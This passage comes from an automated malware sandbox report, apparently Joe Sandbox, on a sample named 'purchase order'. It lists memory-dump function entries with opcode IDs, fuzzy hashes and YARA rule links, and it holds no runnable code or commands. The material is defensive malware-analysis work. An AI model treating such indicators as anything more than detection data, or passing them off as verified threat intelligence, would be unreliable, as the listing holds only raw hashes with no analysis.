                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1838270342.000000000076D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0076D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_76d000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                              • Instruction ID: 582ee6aea6e01dfbfac1018e78334ba0e7ee2361f59295c8f223850b33571930
                                                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                              • Instruction Fuzzy Hash: 4311DF72904280CFCB12CF00D5C4B16BF72FB94324F24C2A9DC0A0B656C33AE85ACBA1
                                                                                                              Function 0077D017 Relevance: .1, Instructions: 53COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1838380085.000000000077D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0077D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77d000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                              • Instruction ID: 59d06eec7f4fb7bc7ea0e15c9ff232049fc7a8ccf83ecdb7074e6997a0271a6e
                                                                                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                              • Instruction Fuzzy Hash: 7311BB75504280CFCB21CF14D5C4B16BBB2FB88314F28C6AAD80D4B656C33AD81ACBA2
                                                                                                              Function 0077D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1838380085.000000000077D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0077D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_77d000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                              • Instruction ID: 652d5c270cb083ad90495f6103861c78353cd1d7ffca6845d0010659d62d00c6
                                                                                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                              • Instruction Fuzzy Hash: 8C117975504280DFDB16CF14D5C4B15BBB1FB84324F28C6AAD8494B696C33AD84ACB61
                                                                                                              Function 04AF32C1 Relevance: .1, Instructions: 53COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b01654af337b021a1ca982f987ba90ad56b0a65ef626b6b1bb903cb10a4364fc
                                                                                                              • Instruction ID: 439b7351820fc9d7c2b62d9e3afceca6e77cfe629699a599d40b5359e66fca86
                                                                                                              • Opcode Fuzzy Hash: b01654af337b021a1ca982f987ba90ad56b0a65ef626b6b1bb903cb10a4364fc
                                                                                                              • Instruction Fuzzy Hash: BE01F171A043448FEF21DFAAD8083DEBFF0EF95310F18884AD45597212CB78984ACB51
                                                                                                              Function 04AF32EE Relevance: .1, Instructions: 52COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3a15d53f1806659e13d92f09cd41cbb96c4ae9a4f3145fa068bb4a02c12dc9c6
                                                                                                              • Instruction ID: 07ce3e00573ab30275043f735833a4d4355fabf2ecf21dc7b47fc2e0ca67489d
                                                                                                              • Opcode Fuzzy Hash: 3a15d53f1806659e13d92f09cd41cbb96c4ae9a4f3145fa068bb4a02c12dc9c6
                                                                                                              • Instruction Fuzzy Hash: 4911C3B59002499FDB10DF9AD984ADEFBF4FB48320F14841AE968A7310C774A545CFA1
                                                                                                              Function 04AF9CC0 Relevance: .1, Instructions: 52COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 88e1d8fe053c5b9c04adb29725624adefb46f6c914fb3aa8bf7be5d75c0f2d66
                                                                                                              • Instruction ID: d299e6048a035cbf30edfb93509df4ab7386b28e55b4d4b32dc2555097f3dfde
                                                                                                              • Opcode Fuzzy Hash: 88e1d8fe053c5b9c04adb29725624adefb46f6c914fb3aa8bf7be5d75c0f2d66
                                                                                                              • Instruction Fuzzy Hash: 7C1189B5E0011A9F8B44DFADD9449AEBBF5FF88310B10816AE919E7315E7309911CBA0
                                                                                                              Function 04AFBADC Relevance: .1, Instructions: 52COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3c00839972aa897b7f738f79eb8f2fa2b82137626bb27804ba81ba6fa2820b66
                                                                                                              • Instruction ID: 0f2c7ec52cbc21bc26eefac2b5ac21ab49a66bbedadb22445c16bc4777fbd032
                                                                                                              • Opcode Fuzzy Hash: 3c00839972aa897b7f738f79eb8f2fa2b82137626bb27804ba81ba6fa2820b66
                                                                                                              • Instruction Fuzzy Hash: A7012632B142189BDB05EFFDC8146AEBBEACF95250B1084A7E50DC7245E934AD024398
                                                                                                              Function 04AF32F0 Relevance: .1, Instructions: 51COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b14df035e845e12dce0a9a2c95566c253ef202e90221579d4d727563320f87b6
                                                                                                              • Instruction ID: 5cb817291cd17d3592c72357be5d9ecbe7d419ba9749ea8fa7b4c36b37eedd0e
                                                                                                              • Opcode Fuzzy Hash: b14df035e845e12dce0a9a2c95566c253ef202e90221579d4d727563320f87b6
                                                                                                              • Instruction Fuzzy Hash: 1411C3B59003499FDB10DF9AC984ADEFBF8FB48320F14841AE958A7310C774A544CFA1
                                                                                                              Function 04AFB998 Relevance: .1, Instructions: 51COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6115f0d9412ab2468be23d91cab1517ee2cf9ef0f4f1227f1822ecb26c3300ce
                                                                                                              • Instruction ID: f88a47c8368fe9bdec50fb539d7580a00f3a095a6b779989b70ee288e7bc1aeb
                                                                                                              • Opcode Fuzzy Hash: 6115f0d9412ab2468be23d91cab1517ee2cf9ef0f4f1227f1822ecb26c3300ce
                                                                                                              • Instruction Fuzzy Hash: 541134B1D002088FDB10DF9AD844A9EFBF4EB48320F10842AE819B7310D374A545CFA1
                                                                                                              Function 04AFBAEC Relevance: .1, Instructions: 51COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 80a2c7ab6233ccc24e916634ed4c61a9b9e5110b79405dcda6557f82a880dee0
                                                                                                              • Instruction ID: e983fba608acd81680a1324fdf96c216d9dec7110d07e058bde39f61db64452d
                                                                                                              • Opcode Fuzzy Hash: 80a2c7ab6233ccc24e916634ed4c61a9b9e5110b79405dcda6557f82a880dee0
                                                                                                              • Instruction Fuzzy Hash: 741134B1D002088FDB10DF9AD844A9EFBF4EB48320F10841AE819B7310D374A545CFA1
                                                                                                              Function 04AF9428 Relevance: .0, Instructions: 50COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3aac8470d6b0a80595a021778879038127b29826ae9df70ddf8a0a8e724b2a74
                                                                                                              • Instruction ID: 66888666840f038bac0cc54e3cfe4ea8bbf73caac4d6ffb07899f4bda11c6797
                                                                                                              • Opcode Fuzzy Hash: 3aac8470d6b0a80595a021778879038127b29826ae9df70ddf8a0a8e724b2a74
                                                                                                              • Instruction Fuzzy Hash: B9111EB1A006199FDF15DFA9C980AAF77E9FF58711F044429FA28D7260DB34E9108BA1
                                                                                                              Function 04AFBC7A Relevance: .0, Instructions: 48COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 304640c28dccdf4472a540931111bec660005d92382cf8c69b21a1cbcb5a87f3
                                                                                                              • Instruction ID: 7f725542434a19be64140760ba65ad428080f25c68f826537cde0723026fdd12
                                                                                                              • Opcode Fuzzy Hash: 304640c28dccdf4472a540931111bec660005d92382cf8c69b21a1cbcb5a87f3
                                                                                                              • Instruction Fuzzy Hash: 1E11A534A00209CFEB28EFF0C8547EE7AB1EF48315F104469E601A7284DF786985CFA5
                                                                                                              Function 04AF2258 Relevance: .0, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 54fb5d33b59b975075190f3898324c785c3cf7c189a0a2c3fd31e74cbad304e4
                                                                                                              • Instruction ID: 12aeaa5ebb81e29f9e59d03ce7280a4f34a52eadc97d6e19aefc064d9edba942
                                                                                                              • Opcode Fuzzy Hash: 54fb5d33b59b975075190f3898324c785c3cf7c189a0a2c3fd31e74cbad304e4
                                                                                                              • Instruction Fuzzy Hash: 331133B69002498FDB20DF99C585BCEFBF4EB48320F10845AE558AB310C375A544CFA1
                                                                                                              Function 04AF0C20 Relevance: .0, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 10eb9e87252e49f950fd61962c546a89830ba636c20ad8e39749c1904087b86d
                                                                                                              • Instruction ID: e78bfa5c7345c13255bc860bfc75e9763187763c70459f9e98c1a4587d8f1300
                                                                                                              • Opcode Fuzzy Hash: 10eb9e87252e49f950fd61962c546a89830ba636c20ad8e39749c1904087b86d
                                                                                                              • Instruction Fuzzy Hash: C81103B69002488FDB20DF9AC544BDEFBF8EB48324F10845AE959BB350D375A944CFA5
                                                                                                              Function 04AFD4E8 Relevance: .0, Instructions: 46COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1cd5d145303b4b6a9b3f37ff707efc957259051499b00cfe8d9be16dcb2a3e98
                                                                                                              • Instruction ID: 14b9b4924fd064335328f4c22c88887fddd79248e3977c8df4b89b3b816cbe8a
                                                                                                              • Opcode Fuzzy Hash: 1cd5d145303b4b6a9b3f37ff707efc957259051499b00cfe8d9be16dcb2a3e98
                                                                                                              • Instruction Fuzzy Hash: 8AF0F472B001159FEF06BAE89D504FEBB76DB88514B000029E608A7781EE343E0287E5
                                                                                                              Function 0076D745 Relevance: .0, Instructions: 45COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1838270342.000000000076D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0076D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_76d000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9ef5fb7f81a5c3ada00fbdf80c001ecf793b31206264b62c6a2fa670f9afed8a
                                                                                                              • Instruction ID: 7527faf75f9868640d6514eedc4d95c4bef1c02d0815af0f6862993c0ca8a48f
                                                                                                              • Opcode Fuzzy Hash: 9ef5fb7f81a5c3ada00fbdf80c001ecf793b31206264b62c6a2fa670f9afed8a
                                                                                                              • Instruction Fuzzy Hash: B501F731A083409AE7204E25CD84B67BF98EF51324F18C52AED0A0A296C67D9C41C672
                                                                                                              Function 04AF1DF5 Relevance: .0, Instructions: 44COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4a229e18df1180de11966024cb0b84cb8f1472fed274154c17f9c36c66d4d883
                                                                                                              • Instruction ID: cb07379409593b00ddb1541f467ac50282836ff67148383162a6f46acf9135d5
                                                                                                              • Opcode Fuzzy Hash: 4a229e18df1180de11966024cb0b84cb8f1472fed274154c17f9c36c66d4d883
                                                                                                              • Instruction Fuzzy Hash: C2112571901208DFEB14CF9AC8447EDBFF1FB48354F24C169E9289B250C7749945CB94
                                                                                                              Function 04AF1E00 Relevance: .0, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1cf3d337aecbdfa9508bc2b1e6de7729d9ae3b3c7164f7b6ccb7eaa175f5f8ee
                                                                                                              • Instruction ID: 622e7301c4b5631f13521ba416a73137cc0f7c52b479105b94d575a19ee1a45f
                                                                                                              • Opcode Fuzzy Hash: 1cf3d337aecbdfa9508bc2b1e6de7729d9ae3b3c7164f7b6ccb7eaa175f5f8ee
                                                                                                              • Instruction Fuzzy Hash: 00010471900208DFDB14CF9AC8447EEBEF5FB48354F24C169E9289B290C7745945CB94
                                                                                                              Function 04AFEB78 Relevance: .0, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7e886585f8c2b1ce2e0d9a579cc9ccade8d2b9d251348b74894d19dad3810236
                                                                                                              • Instruction ID: 8ff50aababfa151bb0257a184274f702cc2fcf0ce2da310dde2543b96c6ae6a0
                                                                                                              • Opcode Fuzzy Hash: 7e886585f8c2b1ce2e0d9a579cc9ccade8d2b9d251348b74894d19dad3810236
                                                                                                              • Instruction Fuzzy Hash: 63018C31A186589FEB55DFA5D890A9EBBF6AF89305F10805AF442EB321CB34D800CB50
                                                                                                              Function 04AFD4F8 Relevance: .0, Instructions: 40COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7dfe726fd8dfd276b5b76a814da9041bec5952ac5718a2080d7fb4406d8b64c8
                                                                                                              • Instruction ID: 463cba3f9ef2ce0e533a243ec14d59fb126206241d7f3d751e33b19dbf899a0c
                                                                                                              • Opcode Fuzzy Hash: 7dfe726fd8dfd276b5b76a814da9041bec5952ac5718a2080d7fb4406d8b64c8
                                                                                                              • Instruction Fuzzy Hash: 2BF09071B001159B9F15B6E8DD509BFBBBAAB88614B500029F609A7780EE347E0187F9
                                                                                                              Function 04AF9C48 Relevance: .0, Instructions: 40COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9dec9f7ab12c0f82c1aadc6f4623b5a3db682e277e2c48bbfe69d30b47b5be73
                                                                                                              • Instruction ID: 076115ba7658d5d066ac69d2984a64d0f40a92f999aa3b3ec8d2346a6c668f38
                                                                                                              • Opcode Fuzzy Hash: 9dec9f7ab12c0f82c1aadc6f4623b5a3db682e277e2c48bbfe69d30b47b5be73
                                                                                                              • Instruction Fuzzy Hash: 6FF02275A106449FCB10EBA9D880CDEFFB9EF8630070041ABE54597332DB30690ACBA1
                                                                                                              Function 0076D744 Relevance: .0, Instructions: 36COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1838270342.000000000076D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0076D000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_76d000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0cfc304e7f4586ffc4f3553142612cb30a2cbf2255b3aa24c810af3089ce27f4
                                                                                                              • Instruction ID: 40b956029562ea2364ea0ec17fcf29de62e57109159f9296cf35a21cd7ab3665
                                                                                                              • Opcode Fuzzy Hash: 0cfc304e7f4586ffc4f3553142612cb30a2cbf2255b3aa24c810af3089ce27f4
                                                                                                              • Instruction Fuzzy Hash: 69F062725043449AE7208E16D888B62FFA8EF51734F18C45AED094B296C2799C45CAB1
                                                                                                              Function 04AF3210 Relevance: .0, Instructions: 34COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9f85ea4b7a067e13becfa9f566c4b6a8aba2f1521d85412f5e6fbc6532c7ecd0
                                                                                                              • Instruction ID: 7c325c97b1a0393201cd789c48d75b73579da0960db80e5c1a36e3e180153e23
                                                                                                              • Opcode Fuzzy Hash: 9f85ea4b7a067e13becfa9f566c4b6a8aba2f1521d85412f5e6fbc6532c7ecd0
                                                                                                              • Instruction Fuzzy Hash: E4E06579B002168FDB14DBB9DC444AEBBB9FF94211710882AD912D3245DB34DC168760
                                                                                                              Function 04AFBCD5 Relevance: .0, Instructions: 29COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 80e8bfe3c995e6d41935135cf6dfb911f725537ac955adb37aa241f8c2f12aea
                                                                                                              • Instruction ID: acc8fd0142df65b552e4257540c146ab07b8ff83a4e26f1e9186e939347e3b81
                                                                                                              • Opcode Fuzzy Hash: 80e8bfe3c995e6d41935135cf6dfb911f725537ac955adb37aa241f8c2f12aea
                                                                                                              • Instruction Fuzzy Hash: B6F05470A00209CBDB28AFB5D8597AE7AB2FF84315F008479D10597284DF786941CFA6
                                                                                                              Function 04AF41F1 Relevance: .0, Instructions: 28COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 613dcc5eb5051a6fd8324a02c1596403f36e5faa1e70df8b911077918fe5e442
                                                                                                              • Instruction ID: 933953dfa5fe28e98ecb684c5842fd6b4d4ee7eae520a387cc19455270984998
                                                                                                              • Opcode Fuzzy Hash: 613dcc5eb5051a6fd8324a02c1596403f36e5faa1e70df8b911077918fe5e442
                                                                                                              • Instruction Fuzzy Hash: 08E06832A042049BDF102FF5BC8879BBFB8EB68251F008535FA0589001F7309629C391
                                                                                                              Function 04AFD710 Relevance: .0, Instructions: 27COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c3a9d93cf648b10f5f75cb8426bd2962a13e7dc25ac05e61fccca0cd0ec61c8c
                                                                                                              • Instruction ID: e80e79ef989ebdef3d7eb9efe577bfe764d08c5766baed673eefbcca3e45ce56
                                                                                                              • Opcode Fuzzy Hash: c3a9d93cf648b10f5f75cb8426bd2962a13e7dc25ac05e61fccca0cd0ec61c8c
                                                                                                              • Instruction Fuzzy Hash: 61E04F72B04118ABA708EAEACD409AFBAEECBC5154B118079A509E7205FD70BD0147A0
                                                                                                              Function 04AF1B09 Relevance: .0, Instructions: 27COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d576f7b884f04574acbbb8b88ea6030e4d3a9af8f0e0222be18541ad76bdad96
                                                                                                              • Instruction ID: 35c40a7c2a0ff6d767f27ad93df4025ea47d003f475999e76fecfbcec0db1fb5
                                                                                                              • Opcode Fuzzy Hash: d576f7b884f04574acbbb8b88ea6030e4d3a9af8f0e0222be18541ad76bdad96
                                                                                                              • Instruction Fuzzy Hash: 7BF0E5B4905205EFC705EFB0E98289D7FB1EB4120472041A8DC0697219D7316F0BEB41
                                                                                                              Function 04AFEE61 Relevance: .0, Instructions: 24COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 87b9f010b36252122e7d85370effcf2b70fe27b6979710eb84806a15126905e0
                                                                                                              • Instruction ID: eeaa5438ea82fb0a6afd8e31ffa05f5606110f88a24589ef0d73f56e7d81abcd
                                                                                                              • Opcode Fuzzy Hash: 87b9f010b36252122e7d85370effcf2b70fe27b6979710eb84806a15126905e0
                                                                                                              • Instruction Fuzzy Hash: A3D05B9371553403EF0B36D87D602EE275ACF959187450559F6164F792FD4C1E0313D6
                                                                                                              Function 04AFD6BE Relevance: .0, Instructions: 23COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0aafdd559cc10215a5b5a5e5930cd9d85f0072a7f3062d6e91ed49b8b8a4c9c6
                                                                                                              • Instruction ID: d6b7079719253acfb739182ae7b46ce64a862b3edca07c0fcd602ebee0fa3085
                                                                                                              • Opcode Fuzzy Hash: 0aafdd559cc10215a5b5a5e5930cd9d85f0072a7f3062d6e91ed49b8b8a4c9c6
                                                                                                              • Instruction Fuzzy Hash: F1E09A71A6010CDACB519FC0E9087EDBB71FB45246F204012E20AB1550CB311540CEA0
                                                                                                              Function 04AFEF18 Relevance: .0, Instructions: 22COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
